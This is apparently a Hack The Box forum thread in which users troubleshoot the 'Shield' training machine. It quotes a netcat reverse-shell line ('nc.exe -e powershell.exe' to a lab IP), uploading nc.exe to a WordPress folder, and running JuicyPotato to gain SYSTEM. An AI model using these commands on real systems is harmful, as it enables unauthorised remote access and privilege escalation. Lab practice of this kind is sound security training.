Starting Point: Shield, JuicyPotato and netcat

@tasidonya 5555
That’s what’s in my .bat file as well.

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

@tasidonya said:

Your command looks good to me. That’s very odd! I would assume that shell.bat is in the correct directory as well. The only thing that comes to mind is if there is anyone else doing Shield at the same time as you and using shell.bat as their file name - it might have got overwritten by their details instead, as Starting Point VMs are shared between everyone.

Yeah, that’s right. I’ll just check back on it.

Thanks

@R4ZZB33RY can you show us the contents of your shell.bat file? Everything else looks fine so I’d suspect something is wrong in that. Either that or you have something blocking the incoming connection on your end (firewall etc). Have you confirmed it works fine if you just run the shell.bat normally from the remote machine rather than trying to run it with js.exe as system?

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe" part after I ran the js.exe. It worked and connected but didn’t give me root.

@R4ZZB33RY said:

@vbScrub
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe" part after I ran the js.exe. It worked and connected but didn’t give me root.

Your .bat file is not correct.

@R4ZZB33RY said:
Here’s my .bat file
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.18 5555

I only tried executing the "nc.exe -e powershell.exe" part after I ran the js.exe. It worked and connected but didn’t give me root.

All that’s going to do is print text to the screen (because you’re running the “echo” command)

@VbScrub said:

All that’s going to do is print text to the screen (because you’re running the “echo” command)

I ended up figuring it out. Thanks for the reply!

@R4ZZB33RY said:

I ended up figuring it out. Thanks for the reply!

Great :smiley:

Guys, I don’t get how to download JuicyPotato. If I go to the GitHub page and I download it, there is no file called JuicyPotato.exe. Where is it??

Here you go: Releases · ohpe/juicy-potato · GitHub

@tasidonya said:

Here you go: Releases · ohpe/juicy-potato · GitHub

Thank you, but when I download the .exe file, it’s empty??

@Jade86 said:

Thank you, but when I download the .exe file, it’s empty??

It gets flagged by your operating system. You have to open the file.

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

@tasidonya said:

Check your antivirus/firewall. It is definitely not empty, since that’s what I have used.

OK, I’ll do that. Just to be absolutely sure, you just clicked on the file and it downloaded, yeah?

@Jade86 yes.

@R4ZZB33RY said:

It gets flagged by your operating system. You have to open the file.

Ah, I see! OK, I feel a bit dumb here, but after I open the file, how do I save it in some folder on my machine? I’m very new to Linux…

Never mind, done it. Thank you guys!!

What am I doing wrong?!

@misentomanuel said:

What am I doing wrong?!
https://imgur.com/zLfx2Zh.png

OK, so I’m not an expert, but it seems that there is no file called nc.exe in your local /home/kali/Desktop folder, so when you try to upload it to the box it tells you so. Then, obviously, when you try to execute it, you can’t because the file is not there.
The reason why you do see a file called nc.exe in the remote uploads folder is probably because someone else is doing the same box and they uploaded it successfully. The other thing: when you execute nc.exe, you need to change the IP address to YOUR own IP address, so that 10.10.14.2 needs to be changed, otherwise you are basically contacting another machine that isn’t yours. Also, when you do lcd /home/username/downloads, that again is a fictitious folder that the guy who wrote the walkthrough created, but you need to substitute the path to your local folder that contains the exploits for that fictitious folder. Start by changing these things, and see how it goes.